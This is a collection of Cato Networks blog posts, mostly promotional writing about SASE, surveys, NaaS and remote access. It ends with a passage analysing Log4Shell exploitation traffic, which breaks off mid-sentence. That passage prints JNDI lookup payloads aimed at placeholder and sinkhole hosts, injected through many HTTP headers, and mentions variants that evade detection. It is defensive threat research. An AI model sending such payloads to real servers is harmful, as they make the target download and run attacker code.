services then is increasingly important to partners not only because of the impact it has on the customer’s business but because of the impact it has on their business. At Cato, I’ve seen that firsthand. The Cato SASE Cloud is a single vendor, cloud-native SASE solution. Our onboarding time for partners is just 4-6 weeks. What’s more the service is always update, managed and protected by our operations and security teams. If you’ve delivered security appliances at all you’ll know how remarkable that is. Having come from a security appliance vendor, I can tell you that onboarding time typically takes many months and requires massive upfront investment. But frankly, the short time to market and easy adoption of a cloud-native SASE platform, like Cato SASE Cloud, is unusual for SASE solutions today. That’s because many vendors rebrand legacy appliances as SASE portfolios. What’s needed, as Gartner points out, is a SASE platform. (Follow the link for detailed differentiation between SASE platforms and SASE portfolios.) It’s little wonder then that when we asked respondents how long should channel partners would require to build a full SASE offering, only 17% assessed that it should take less than two months. By contrast, nearly half (44%) estimated that it should take up to a year, and 39% estimated that it should take more than a year. Still, with the easy delivery of SASE platforms, the security improvements SASE brings to the enterprise, and the ability to deliver and manage the complete range of enterprises security and networking services from a single solution, the vast majority of respondents (84%) believe that SASE will become the preferred choice among customers.  Over 70% of respondents agree or strongly agree that customers are already looking into SASE to simplify their network and lower TCO (total cost of ownership). It should be no surprise that most channel partners have adopted (59%) or are looking to offer their customers a SASE solution (31%) Only 10% of respondents have no plans to offer SASE anytime soon. To learn more about Cato and its partner program, visit https://www.catonetworks.com/partners/    

Security or Performance

Survey Reveals Confusion about the Promise of SASE Prioritizing between network security and network performance is hardly a strategy. Yet, Cato’s recent industry survey with non-Cato customers, Security or Performance: How do you Prioritize?, shows that de facto 2045 respondents (split evenly between security and network roles), need to – or believe they’ll have to...
Security or Performance Survey Reveals Confusion about the Promise of SASE Prioritizing between network security and network performance is hardly a strategy. Yet, Cato’s recent industry survey with non-Cato customers, Security or Performance: How do you Prioritize?, shows that de facto 2045 respondents (split evenly between security and network roles), need to – or believe they’ll have to – choose between security and performance. Nothing too earth-shattering there; Gartner and other industry leaders have long reached the conclusion that Secure Access Service Edge (SASE) is the suitable network to support both security and performance needs of the digital business. So, unless using SASE, enterprises would inevitably end up having to compromise between the two. But here’s what is shattering (and particularly confusing): Albeit the fact that the essence of SASE is never having to choose between security and performance; the 8.5% of respondents already using non-Cato’s SASE revealed an unavoidable need to compromise between them – similar to non-SASE users. Why the Confusion? We believe this confusion is due to vendors claiming to provide a SASE platform, where in reality they’re merely offering a portfolio of point solutions, packaged into what they misleadingly call SASE. This state was anticipated by Gartner with an explicit warning that “vendor hype complicates the understanding of the SASE market.”1 A true SASE solution – one that supports both security and performance requirements – must converge SD-WAN and cloud-native security services (FWaaS, SWG, CASB, SDP/ZTNA) in a unified software stack with single-pass processing. This approach boosts performance, increases security, and reduces overall network complexity. Deploying point-solutions patched together from so-called SASE vendors, doesn’t add up to a real SASE service. This can’t offer the enhanced security and optimized performance of a converged platform. Yet, this is the SASE service respondents know, hence their confusion is apparent across the survey. For example, when asked how they react to performance issues with cloud applications, reactions of SASE and non-SASE users were similar. 67% of SASE users would add bandwidth, and 61% of non-SASE users claimed the same. 19% of SASE users would buy a WAN optimization appliance, as 21% of non-SASE users indicated as well. Evidently SASE users are still suffering from performance issues, and they are forced to add point solutions accordingly. This slows down performance and makes their network more complex and less secure. Confusion on this topic was even more noticeable among SASE users, where 14% (compared to 9% among non-SASE users) admitted they simply don’t know what to do in case of performance issues. Here are some examples of answers: “Ignore and pray it goes away,” “wait it out – ugh,” “suffer through it,” “don’t know,” and “not sure.” Improving remote access performance was one of the three main business priorities for all respondents. This makes perfect sense in the new work-from-everywhere reality; and this is one of the most straightforward use cases of SASE. Yet even here, SASE and non-SASE users experience the same problems. 24% of SASE users vs. 27% of non-SASE users complain about poor voice/video quality. Slow application response received the same 50% from both SASE and non-SASE users. Respondents were also asked to rate the level of confidence in their ability to detect and respond to malware and cyber-attacks. Here too, results across the board were highly comparable. On a scale of 1-10 the average answer for SASE users was 4, and for non-SASE users 3. Both answers indicate a low level of confidence in dealing with critical situations that can severely impact the network. Although Gartner claims that SASE is the future of network security, for these respondents it’s as if having SASE makes no difference at all. [boxlink link="https://www.catonetworks.com/resources/the-total-economic-impact-of-cato-networks?utm_source=blog&utm_medium=top_cta&utm_campaign=tei"] What to expect when you’re expecting…SASE | Find Out [/boxlink] Making Sense of the Confusion Respondents already using SASE are confused – and probably disappointed – from their first experience with what was presented to them a SASE service. Be aware of vendors that take an appliance, convert it to a virtual machine, host it in the cloud and call it SASE. Unfortunately, this sounds like trying to deliver a Netflix-like service from stacking thousands of DVD players in the cloud. And, from the very beginning, Gartner advised to “avoid SASE offerings that are stitched together.” We’re honored that Cato SASE Cloud users present the flip side of this confusion. Aligned with Gartner’s SASE framework, we deliver a converged, cloud-native platform that is globally distributed across 70+PoPs, and covers all edges. As opposed to confused respondents using so called SASE services, our customers clearly understand the value of SASE and have no dilemma when it comes to security and performance. SASE is not a trade-off between performance and security efficacy, but rather the convergence of both. “With Cato, we could move people out from our offices to their home, ensuring the same security level, performance.” “The big difference between Cato and other solutions is the integration of network management and security.”   “Cato provides us with a platform for delivering the networking and security capabilities that help our users increase their productivity.” “The business is moving very fast. Now with Cato we can match that speed on the network side.” What about all those non SASE users? What’s their strategy? Only 29% indicated they have no plans to deploy SASE. Clearly, respondents realize the value of SASE and admit that SASE is a must; the question for them isn’t if to migrate, but rather when. This is also in line with Gartner’s prediction that “by 2025, at least 60% of enterprises will have explicit strategies and timelines for SASE adoption.” Let’s hope these respondents are introduced to true SASE offerings and enjoy both security and performance. No compromising…    

New Gartner Report Explores The Portfolio or Platform Question for SASE Solutions

Understanding SASE is tricky because it has no “new cool feature.” Rather, SASE is an architectural shift that fundamentally changes how common networking and security capabilities are delivered to users, locations, and applications globally. It is, primarily, a promise for a simple, agile, and holistic way of delivering secure and optimized access to everyone, everywhere,...
New Gartner Report Explores The Portfolio or Platform Question for SASE Solutions Understanding SASE is tricky because it has no “new cool feature.” Rather, SASE is an architectural shift that fundamentally changes how common networking and security capabilities are delivered to users, locations, and applications globally. It is, primarily, a promise for a simple, agile, and holistic way of delivering secure and optimized access to everyone, everywhere, and on any device. When Gartner introduced SASE in the 2019 report, The Future of Network Security is in the Cloud, the analyst firm highlighted convergence of network and network security services as the main architectural attribute of SASE. According to Gartner, “This market converges network (for example, software-defined WAN [SD-WAN]) and network security services (such as SWG, CASB and firewall as a service [FWaaS]). We refer to it as the secure access service edge and it is primarily delivered as a cloud-based service.” Cobbling together multiple products wasn’t a converged approach from both technology and management perspectives. Many vendors got the message and started to create their single-vendor solutions. Some developed missing components, such as adding SD-WAN capability to a firewall appliance. Others acquired pieces such as SD-WAN, CASB, or Remote Browser Isolation (RBI) to build on to existing solutions. According to Gartner ® Market Opportunity Map: Secure Access Service Edge, Worlwide1  report, by 2023, no less than 10 vendors will offer a one-stop-shop SASE solution. Cato is a big proponent of “convergence" as a key requirement for fulfilling the SASE promise. The direction of many SASE vendors is towards a “one stop shop.” Does “convergence” equal “one-stop shop” and should you care? [boxlink link="https://www.catonetworks.com/resources/what-to-expect-when-youre-expectingsase/?utm_source=blog&utm_medium=top_cta&utm_campaign=expecting_sase"] The Total Economic Impact™ of Cato's SASE Cloud | Read Report [/boxlink] SASE: Platform (“convergence”) does not mean Portfolio (owned by a “one stop shop”) The answer to that question was addressed in a recent research paper from Gartner titled "Predicts 2022: Consolidated Security Platforms Are the Future"2 There Gartner makes a key distinction between Portfolio and Platform security companies. According to Gartner: “Vendors are taking two clear approaches to consolidation: Platform Approach Leverage interdependencies and commonalities among adjacent systems Integrating consoles for common functions  Support for organizational business objectives at least as effectively as best-of-breed  Integration and operational simplicity mean security objectives are also met.  Portfolio Approach  Leveraged set of unintegrated or lightly integrated products in a buying package  Multiple consoles with little to no integration and synergy Legacy approach in a vendor wrapper  Will not fulfill any of the promised advantages of consolidation.  Differentiating between these approaches is key to the efficiency of the suite, and vendor marketing will always say they are a platform. As you evaluate products, you must look at how integrated the consoles are for the management and monitoring of the consolidated platform. Also, assess how security elements (such as data definitions, malware engines) and more can be reused without being redefined, or can apply across multiple areas seamlessly. Multiple consoles and multiple definitions are warnings that this is a portfolio approach that should be carefully evaluated.” SASE Platforms Require Cloud-based Delivery Convergence of networking and security is, however, just one step towards fulfilling the SASE promise. Cloud-based delivery is the key ingredient for achieving the operational and security benefits of SASE. According to Gartner: “As the platforms shift to the cloud for management, analysis and even delivery, the ability to leverage the shared responsibility model for security brings enormous benefits to the consumer. However, this extends the risk surface to the vendor and requires further due diligence in third-party vendor management. The benefits include: Lack of physical technical debt; there is no hardware to amortize before shifting vendors or technology. The end-customer’s data center footprint is reduced or eliminated for key technologies.  Operational tasks (e.g., patching, upgrades, performance scaling and maintenance) are performed by the cloud provider. The system is maintained and monitored around the clock, and the staffing of the provider supplements that of the end customer.  Controls are placed close to the hybrid modern workforce and to the distributed modern data; the path is not forced through an arbitrary, customer-owned location for filtering.  Despite being large targets, cloud-native security vendors have the scale and focus to secure, manage, and monitor their infrastructure better than most individual organizations.”  Gartner analysts Neil MacDonald and Charlie Winckless in the report predict that “[B]y 2025, 80% of enterprises will have adopted a strategy to unify web, cloud services and private application access from a single vendor’s SSE [secure service edge] platform.” One of their key findings that led to this strategic planning assumption is: “Single-vendor solutions provide significant operational efficiency and security efficacy, compared with best-of-breed, including reduced agent bloat, tighter integration, fewer consoles to use, and fewer locations where data must be decrypted, inspected, and recrypted.” The report further states: “The shift to remote work and the adoption of public cloud services was well underway already, but it has been further accelerated by COVID-19. SSE allows the organization to support anywhere, anytime workers using a cloud-centric approach for the enforcement of security policy. SSE offers immediate opportunities to reduce complexity, costs and the number of vendors.” Cato: The SASE Platform powered by a Global Backbone How does Cato measure up to this vision of the future? Cato was built from the ground up as a cloud-native service, built on one global backbone, to deliver one security stack, managed from a single console, and enforcing one comprehensive networking and security policy on all users, locations, and applications—and it’s all available today from this single vendor. We welcome you to test drive the simple, agile, and holistic Cato SASE Cloud. We promise an eye-opening experience. Learn more: Security Service Edge (SSE): It’s SASE without the “A” (blog post) How to Secure Remote Access (blog post) The Future of Security: Do All Roads Lead to SASE? (webinar) 8 Ways SASE Answers Your Future IT & Security Needs (eBook)   1 Gartner, “Market Opportunity Map: Secure Access Service Edge, Worldwide ”  Joe Skorupa, Nat Smith, and Even Zeng. July 16, 2021  2 Gartner, “Predicts 2022: Consolidated Security Platforms Are the Future” Charlie Winckless, Joerg Fritsch, Peter Firstbrook, Neil MacDonald, and Brian Lowans. December 1, 2021     GARTNER is registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.       

What is Network-as-a-Service and Why WAN Transformation Needs NaaS and SASE

The networking industry loves a good buzzword as much as any other IT sector. Network-as-a-Service (NaaS) certainly fits that billing. The term has been around for at least a decade has come back in vogue to describe networking purchased on a subscription basis. But what’s particularly interesting for anyone moving away from a global MPLS...
What is Network-as-a-Service and Why WAN Transformation Needs NaaS and SASE The networking industry loves a good buzzword as much as any other IT sector. Network-as-a-Service (NaaS) certainly fits that billing. The term has been around for at least a decade has come back in vogue to describe networking purchased on a subscription basis. But what’s particularly interesting for anyone moving away from a global MPLS network or otherwise looking at WAN transformation is the impact NaaS will have on evolving the enterprise backbone. For all of its talk, SASE as understood by much of the industry, will not completely replace a global MPLS network; the Internet is simply too unpredictable for that. Only by converging SASE with NaaS can companies eliminate costly, legacy MPLS services. What is NaaS (Network-as-a-Service) Exactly what constitutes a NaaS is open to some debate. All agree that NaaS offerings allow enterprises to consume networking on a subscription basis without having to deploy any hardware. According to a recent Network World article, IDC’s senior research analyst Brandon Butler wrote in a recent whitepaper "NaaS models are inclusive of integrated hardware, software, licenses and support services delivered in a flexible consumption or subscription-based offering.” Cisco in its recent report flushed that out a bit further defining NaaS as “a cloud-enabled, usage-based consumption model that allows users to acquire and orchestrate network capabilities without owning, building, or maintaining their own infrastructure,” writes industry analyst, Tom Nolle. Gartner identifies the specific attributes of a cloud service. According to Gartner’s Andrew Lerner, “NaaS is a delivery model for networking products. NaaS offerings deliver network functionality as a service, which include the following capabilities: elf-service capability on-demand usage, Ability to scale up and down. billed on an opex model consumption-based, via a metered metric (such as ports, bandwidth or users), (not based on network devices/appliances). NaaS offerings may include elements such as network switches, routers, gateways and firewalls.” For those running datacenter networks, Network World reports NaaS offerings will allow them to purchase compute, networking, and storage components configured through an API and controlled by a common management package. (Personally, I find the focus on the appliance form factor a reflection of legacy thinking. Gartner’s view of a consumption-based model based on bandwidth or users, not appliances, I think to be more accurate but let’s leave that aside for the comment.) But for those involved in the WAN, NaaS is also increasingly coming to describe a new kind of backbone, one that’s programmable, sold on a subscription basis, and designed for the cloud. “I see NaaS as a way to describe agile, programmable backbones and interconnections in a hybrid, multi-cloud architecture,” wrote Shamus McGillicuddy, vice president of network management research at Enterprise Management Associates in an email. [boxlink link="https://www.catonetworks.com/resources/terminate-your-mpls-contract-early-heres-how/?utm_source=blog&utm_medium=top_cta&utm_campaign=terminate_mpls_ebook"] Terminate Your MPLS Contract Early | Here’s How [/boxlink] NaaS Must Meet SASE But here’s the thing, with the proliferation of threats any networking service cannot be divorced from security policy enforcement and threat prevention. It’s why SASE has emerged to be such a dominant force. The convergence of SD-WAN with four areas of security -- NGFW, SWG, CASB, and ZTNA – enables enterprises to extend security policies everywhere will also being more effective and more efficient. (Just check out what our customers say if you want first-hand proof.) But SASE alone can’t replace MPLS. Converging SD-WAN and security still doesn’t address the need for a predictable, efficient global backbone. And the public Internet is far too unpredictable, too inefficient to support the global enterprise. What’s needed is to converge SASE with a backbone NaaS – a global private backbone delivered on subscription basis. Cato: The Global SASE Platform That Includes NaaS The Cato SASE Cloud is the only SASE platform that operates across its own global private backbone, providing SASE and backbone NaaS in one. With the Cato SASE platform, enterprises not only converge security with SD-WAN, but they also get predictable, optimized global connectivity. “Cato Networks operates its own security network as a service (NaaS) providing a range of security services including SWG, FWaaS, VPN, and MDR from its own cloud-based network,” writes Futuriom in its “Cloud Secure Edge and SASE Trends Report.” (Click on the link to download the report for free) The Cato private backbone is a global, geographically distributed, SLA-backed network of 65+ PoPs, interconnected by multiple tier-1 carriers. Each PoP run Cato’s cloud-native software stack that along with security convergence provides global routing optimization and WAN optimization for maximum end-to-end throughput. Our software continuously monitors network services for latency, packet loss, and jitter to determine, in real-time, the best route for sending every network packet. In fact, according to independent testing, is the only backbone NaaS in the world to include WAN optimization and, as a result, increases iPerf throughput 10x-20x over what you’d expect to see with MPLS or Internet. The backbone is fully encrypted for maximum security and self-healing for maximum uptime. The Cato Socket, Cato’s edge SD-WAN device, automatically connects to the nearest Cato PoP. All outbound site traffic is sent to the PoP. Policies then direct Internet traffic out to the Internet and the rest across the Cato backbone. SASE and NaaS Better Together Converging SASE and backbone NaaS together also offers unique advantages compared to keeping the two separate. Deployment becomes incredibly quick. Customers can often bring up new locations on Cato -- complete with SD-WAN, routing policies, access policies, malware protection rules, and global backbone connections – in under two hours and without expert IT assistance. Convergence also allows for deeper insights. Cato captures and stores the metadata of every traffic flow from every user across its global private backbone in a massive data lake. This incredible resource enables Cato engineers to do all sorts of “what if” analysis, which would otherwise be impossible. One practical example – the Cato Event screen, which displayed all connectivity, routing, security, system, and Socket management events on one queryable timeline for the past year. Suddenly it becomes very simple to see why users might be having a problem. Was it a last-mile issue? A permissions issue caused by a reconfigured firewall rule? Something else? Identifying root cause becomes much quicker and simpler when you have a single, holistic view of your infrastructure. [caption id="attachment_21441" align="alignnone" width="1920"] Converging the backbone, SD-WAN, and security into one service enables all events to be presented in a single screen for easy troubleshooting. [/caption] WAN Transformation That Makes Sense In short, converging NaaS and SASE together results in better WAN transformation, one that reduces cost, simplifies security, and improves performance all without compromising on the predictability and reliability enterprises expect from their networks. Hard to believe? Yeah, we get that. It’s why we’ve been called the “Apple of networking.” But don’t take our word for it. Take us for test drive and see for yourself. We can usually get a POC set up in minutes and hours not days. But that shouldn’t be a surprise. We’re an “as a service” after all.    

How to Secure Remote Access

Hundreds of millions of people worldwide were directed to work remotely in 2020 in response to pandemic lockdowns. Even as such restrictions are beginning to ease in some countries and employees are slowly returning to their offices, remote work continues to be a popular workstyle for many people. Last June, Gartner surveyed more than 100...
How to Secure Remote Access Hundreds of millions of people worldwide were directed to work remotely in 2020 in response to pandemic lockdowns. Even as such restrictions are beginning to ease in some countries and employees are slowly returning to their offices, remote work continues to be a popular workstyle for many people. Last June, Gartner surveyed more than 100 company leaders and learned that 82% of respondents intend to permit remote working at least some of the time as employees return to the workplace. In a similar pattern, out of 669 CEOs surveyed by PwC, 78% say that remote work is a long-term prospect. For the foreseeable future, organizations must plan how to manage a more complex, hybrid workforce as well as the technologies that enable their productivity while working remotely. The Importance of Secure Remote Access Allowing employees to work remotely introduces new risks and vulnerabilities to the organization. For example, people working at home or other places outside the office may use unmanaged personal devices with a suspect security posture. They may use unsecured public Internet connections that are vulnerable to eavesdropping and man-in-the-middle attacks. Even managed devices over secured connections are no guarantee of a secure session, as an attacker could use stolen credentials to impersonate a legitimate user. Therefore, secure remote access should be a crucial element of any cybersecurity strategy. [boxlink link="https://www.catonetworks.com/resources/the-hybrid-workforce-planning-for-the-new-working-reality/?utm_source=blog&utm_medium=top_cta&utm_campaign=hybrid_workforce"] The Hybrid Workforce: Planning for the New Working Reality | Download eBook [/boxlink] How to Secure Remote Access: Best Practices Secure remote access requires more than simply deploying a good technology solution. It also demands a well-designed and observed company security policy and processes to prevent unauthorized access to your network and its assets. Here are the fundamental best practices for increasing the security of your remote access capabilities. 1. Formalize Company Security Policies Every organization needs to have information security directives that are formalized in a written policy document and are visibly supported by senior management. Such a policy must be aligned with business requirements and the relevant laws and regulations the company must observe. The tenets of the policy will be codified into the operation of security technologies used by the organization. 2. Choose Secure Software Businesses must choose enterprise-grade software that is engineered to be secure from the outset. Even small businesses should not rely on software that has been developed for a consumer market that is less sensitive to the risk of cyber-attacks. 3. Encrypt Data, Not Just the Tunnel Most remote access solutions create an encrypted point-to-point tunnel to carry the communications payload. This is good, but not good enough. The data payload itself must also be encrypted for strong security. 4. Use Strong Passwords and Multi-Factor Authentication Strong passwords are needed for both the security device and the user endpoints. Cyber-attacks often happen because an organization never changed the default password of a security device, or the new password was so weak as to be ineffective. Likewise, end-users often use weak passwords that are easy to crack. It’s imperative to use strong passwords and MFA from end to end in the remote access solution. 5. Restrict Access Only to Necessary Resources The principle of least privilege must be utilized for remote access to resources. If a person doesn’t have a legitimate business need to access a resource or asset, he should not be able to get to it. 6. Continuously Inspect Traffic for Threats The communication tunnel of remote access can be compromised, even after someone has logged into the network. There should be a mechanism to continuously look for anomalous behavior and actual threats. Should it be determined that a threat exists, auto-remediation should kick in to isolate or terminate the connection. Additional Considerations for Secure Remote Access Though these needs aren’t specific to security, any remote access solution should be cost-effective, easy to deploy and manage, and easy for people to use, and it should offer good performance. Users will find a workaround to any solution that is slow or hard to use. Enterprise Solutions for Secure Remote Access There are three primary enterprise-grade solutions that businesses use today for secure remote access: Virtual Private Network (VPN); Zero Trust Network Access (ZTNA); and Secure Access Service Edge (SASE). Let’s have a look at the pros and cons of each type of solution. 1. Virtual Private Network (VPN) Since the mid-1990s, VPNs have been the most common and well-known form of secure remote access. However, enterprise VPNs are primarily designed to provide access for a small percentage of the workforce for short durations and not for large swaths of employees needing all-day connectivity to the network. VPNs provide point-to-point connectivity. Each secure connection between two points requires its own VPN link for routing traffic over an existing path. For people working from home, this path is going to be the public Internet. The VPN software creates a virtual private tunnel over which the user’s traffic goes from Point A (e.g., the home office or a remote work location) to Point B (usually a terminating appliance in a corporate datacenter or in the cloud). Each terminating appliance has a finite capacity for simultaneous users; thus, companies with many remote workers may need multiple appliances. VPN visibility is limited when companies deploy multiple disparate appliances. Security is still a considerable concern when VPNs are used. While the tunnel itself is encrypted, the traffic traveling within that tunnel typically is not. Nor is it inspected for malware or other threats. To maintain security, the traffic must be routed through a security stack at its terminus on the network. In addition to inefficient routing and increased network latency, this can result in having to purchase, deploy, monitor, and maintain security stacks at multiple sites to decentralize the security load. Simply put, providing security for VPN traffic is expensive and complex to manage. Another issue with VPNs is that they provide overly broad access to the entire network without the option of controlling granular user access to specific resources. There is no scrutiny of the security posture of the connecting device, which could allow malware to enter the network. What’s more, stolen VPN credentials have been implicated in several high-profile data breaches. By using legitimate credentials and connecting through a VPN, attackers were able to infiltrate and move freely through targeted company networks. 2. Zero Trust Network Access (ZTNA) An up-and-coming VPN alternative is Zero Trust Network Access, which is sometimes called a software-defined perimeter (SDP). ZTNA uses granular application-level access policies set to default-deny for all users and devices. A user connects to and authenticates against a Zero Trust controller, which implements the appropriate security policy and checks device attributes. Once the user and device meet the specified requirements, access is granted to specific applications and network resources based upon the user’s identity. The user’s and device’s status are continuously verified to maintain access. This approach enables tighter overall network security as well as micro-segmentation that can limit lateral movement in the event a breach occurs. ZTNA is designed for today’s business. People work everywhere — not only in offices — and applications and data are increasingly moving to the cloud. Access solutions need to be able to reflect those changes. With ZTNA, application access can dynamically adjust based on user identity, location, device type, and more. What’s more, ZTNA solutions provide seamless and secure connectivity to private applications without placing users on the network or exposing apps to the internet. ZTNA addresses the need for secure network and application access but it doesn’t perform important security functions such as checking for malware, detecting and remediating cyber threats, protecting web-surfing devices from infection, and enforcing company policies on all network traffic. These additional functions, however, are important offerings provided by another secure remote access solution known as Secure Access Service Edge. 3. Secure Access Service Edge (SASE) SASE converges ZTNA, NextGen firewall (NGFW), and other security services along with network services such as SD-WAN, WAN optimization, and bandwidth aggregation into a cloud-native platform. Enterprises that leverage a SASE networking architecture receive the security benefits of ZTNA, plus a full suite of converged network and security solutions that is both simple to manage and highly scalable. It is the optimal enterprise VPN alternative, and the Cato SASE solution provides it all in a cloud-native platform. Cato’s SASE solution enables remote users, through a client or clientless browser access, to access all business applications via a secure and optimized connection. The Cato Cloud, a global cloud-native service, can scale to accommodate any number of users without deploying a dedicated VPN infrastructure. Remote workers (mobile users too!) connect to the nearest Cato PoP – there are more than 60 PoPs worldwide – and their traffic is optimally routed across the Cato global private backbone to on-premises or cloud applications. Cato’s Security as a Service stack protects remote users against threats and enforces application access control. The Cato SASE platform provides optimized and highly secure remote access management for all remote workers. For more information on how to support your remote workforce, get the free Cato ebook Work From Anywhere for Everyone.        

Independent Compliance and Security Assessment – Two Additions to the All-New Cato Management Application

If a picture tells a thousand words, then a new user interface tells a million. The new Cato Management Application that we announced today certainly brings a scalable, powerful interface. But it’s far more than just another pretty face. It’s a complete restructuring of the backend event architecture and a new frontend with more than...
Independent Compliance and Security Assessment – Two Additions to the All-New Cato Management Application If a picture tells a thousand words, then a new user interface tells a million. The new Cato Management Application that we announced today certainly brings a scalable, powerful interface. But it’s far more than just another pretty face. It’s a complete restructuring of the backend event architecture and a new frontend with more than 103 improvements. New dashboards and capabilities can be found throughout the platform. We improved cloud insight with a new advanced cloud catalog. New independent conformance testing for regulatory compliance and security capabilities is, I think, a first in the industry. We enhanced security reporting with an all-new threats dashboard and opened up application performance with another new dashboard. Let’s take a closer look at some of these changes. New Topology View and a New Backend The top-level topology view has been redesigned to accommodate deployments of thousands of sites and tens of thousands of users. But in the new Management Application, we’ve enabled customization of the top-level view, enabling you to decide how much detail to show across all edges — sites, remote users, and cloud assets — connected to and are secured by Cato SASE Cloud (see Figure 1).   [caption id="attachment_20988" align="alignnone" width="1024"] Figure 1 Cato’s new Management Application lets enterprises continue to manage their network, security, and access infrastructure from a common interface (1). The new front-end is completely customizable and can surface the providers (2) connecting sites and remote users. You can easily identify problematic sites (3) and drill down into a user or location’s stats at a click (4). [/caption] Behind the Cato Management Application is a completely rearchitected backend. Improved query analytics for site metrics and events makes the process more efficient and the interface more responsive even with customer environments generating over 2 billion events per day. A new event pipeline increases the event retrieval volume while allowing NetOps and NetSecOps to be more specific and export just the necessary events. [boxlink link="https://www.catonetworks.com/resources/management-application-walkthrough/"] Cato Management Application [30 min Walkthrough] | Take the Tour [/boxlink] Independent Compliance Rating Revolutionizes Compliance and Security Verification A new cloud application catalog has been introduced with 5000 of the most common enterprise applications. For each application, the catalog includes a detailed description of the target app automatically generated by a proprietary data mining service and an independently verified risk score (see Figure 2). [caption id="attachment_20990" align="alignnone" width="1920"] Figure 2: The new Cloud Apps Catalog contains more than 5000 applications with an overall risk score[/caption] The risk score is based on Cato’s automated and independent assessment of the cloud application’s compliance levels and security capabilities. Using the massive data lake we maintain of the metadata from every flow crossing Cato’s Global Private Backbone, machine learning algorithms automatically check an application’s claimed regulatory compliance and security features. Currently, Cato regulatory compliance verification includes HIPAA, PCI, and SOC 1-3. Security feature verification includes MFA, encryption of data at rest, and SSO (see Figure 3). [caption id="attachment_20992" align="alignnone" width="1660"] Figure 3: Cato independently verifies the application’s conformance with regulations and security features[/caption] New Threat Dashboard Identifies Key Threats Across the Enterprise [caption id="attachment_21022" align="alignnone" width="1919"] Figure 4: The new Threat Dashboard provides a snapshot of threats across enterprise security infrastructure for assessing the company’s Shadow IT position[/caption] The new Threat Dashboard summarizes the insights drawn from Cato’s Managed IPS, FWaaS, SWG, and Anti-Malware services. Through a single dashboard, security teams can see the top threats across the enterprise. A dynamic, drill-down timeline allows security teams to gather more insight. Top hosts and users identify the impacted individuals and endpoints (Figure 4). New Application Dashboard Provides Snapshot of Usage Analytics With the new Application Dashboard, you gain an overall view of your enterprise application analytics. Administrators can easily understand current and historical bandwidth consumption and flow generation by combinations of sites, users, applications, domains, and categories (Figure 5). [caption id="attachment_20996" align="alignnone" width="1442"] Figure 5: The new Application Analytics dashboard provides an overview of an application usage that can be easily segmented by combinations of multiple dimensions. In this case, application consumption is shown for each user at a particular site.[/caption] The Cato Management Application is currently available at no additional charge. To learn more about the management platform, click here or check out this 30 min walkthrough video. You can also contact us for a personal demo.    

Log4J – A Look into Threat Actors Exploitation Attempts

On December 9, a critical zero-day vulnerability was discovered in Apache Log4j, a very common Java logging tool. Exploiting this vulnerability allows attackers to take control over the affected servers, and this prompted a CVSS (Common Vulnerability Scoring System) severity level of 10. LogJam, also known as Log4Shell, is particularly dangerous because of its simplicity...
Log4J – A Look into Threat Actors Exploitation Attempts On December 9, a critical zero-day vulnerability was discovered in Apache Log4j, a very common Java logging tool. Exploiting this vulnerability allows attackers to take control over the affected servers, and this prompted a CVSS (Common Vulnerability Scoring System) severity level of 10. LogJam, also known as Log4Shell, is particularly dangerous because of its simplicity – forcing the application to write just one simple string allows attackers to upload their own malicious code to the application. To make things worse, working PoCs (Proof of Concept) are already available on the internet, making even inexperienced attackers a serious threat. Another reason this vulnerability is getting so much attention is the mass adoption of Log4j by many enterprises. Amazon, Steam, Twitter, Cisco, Tesla, and many others all make use of this library, which means different threat actors have a very wide range of targets from which to choose. As the old saying goes – not every system is vulnerable, not every vulnerability is exploitable and not every exploit is usable, but when all of these align Quick Mitigation At Cato, we were able to push mitigation in no-time, as well as have it deploy across our network, requiring no action whatsoever from customers with IPS enabled. The deployment was announced in our Knowledge Base together with technical details for customers. Moreover, we were able to set our detections based on traffic samples from the wild, thus minimizing the false positive rate from the very first signature deployment, and maximizing the protection span for different obfuscations and bypass techniques. Here are a couple of interesting exploit attempts we saw in the wild. These attempts are a good representation of an attack’s lifecycle and adoption by various threat actors, once such a vulnerability goes public. [boxlink link="https://www.catonetworks.com/resources/ransomware-is-on-the-rise-catos-security-as-a-service-can-help?utm_source=blog&utm_medium=top_cta&utm_campaign=ransomware_ebook"] Ransomware is on the rise | Download eBook [/boxlink] Exploit Trends and Anecdotes We found exploit attempts using the normal attack payload: ${jndi:ldap://<MALICIOUS DOMAIN>/Exploit}  We identified some interesting variations and trends: Adopted by Scanners Interestingly, we stumbled across scenarios of a single IP trying to send the malicious payload over a large variety of HTTP headers in a sequence of attempts: Access-Control-Request-Method: ${jndi:ldap://<REDACTED_IP>:42468/a} Access-Control-Request-Headers: ${jndi:ldap://<REDACTED_IP>:42468/a} Warning: ${jndi:ldap://<REDACTED_IP>:42468/a} Authorization: ${jndi:ldap://<REDACTED_IP>:42468/a} TE: ${jndi:ldap://<REDACTED_IP>:42468/a} Accept-Charset: ${jndi:ldap://<REDACTED_IP>:42468/a} Accept-Datetime: ${jndi:ldap://<REDACTED_IP>:42468/a} Date: ${jndi:ldap://<REDACTED_IP>:42468/a} Expect: ${jndi:ldap://<REDACTED_IP>:42468/a} Forwarded: ${jndi:ldap://<REDACTED_IP>:42468/a} From: ${jndi:ldap://<REDACTED_IP>:34467/a} X-Api-Version: ${jndi:ldap://<REDACTED_IP>:42468/a} Max-Forwards: ${jndi:ldap://<REDACTED_IP>:34467/a} Such behavior might be attributed to Qualys vulnerability scanner, which claimed to add a number of tests that attempt sending the Log4j vulnerability payloads across different HTTP headers. While it’s exciting to see the quick adoption of pentesting and scanning tools for this new vulnerability, one can’t help but wonder what would happen if these tools were used by malicious actors. Sinkholes Created nspecting attack traffic allowed us to find sinkhole addresses used for checking vulnerable devices. Sinkholes are internet-facing servers that collect traffic sent to them when a vulnerability PoC is found to be successful.   A bunch of HTTP requests with headers such as the ones below indicate the use of a sinkhole:  User-Agent: ${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent  User-Agent: ${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}  We can tell that the sinkhole address matches the protocol and header on which the exploit attempt succeeds.   This header seen in the wild:  X-Api-Version: ${jndi:ldap://<REDACTED>.burpcollaborator.net/a  This is an example of using the burpcollaborator platform for sinkholing successful PoCs. In this case, the header used was an uncommon one, trying to bypass security products that might have overlooked it.   Among many sinkholes, we also noticed <string>.bingsearchlib.com, as mentioned here too.   Bypass Techniques Bypass techniques are described in a couple of different GitHub projects ([1], [2]). These bypass techniques mostly leverage syntactic flexibility to alter the payload to one that won’t trigger signatures that capture the traditional PoC example only. Some others alter the target scheme from the well-known ldap:// to rmi://, dns:// and ldaps:// A funny one we found in 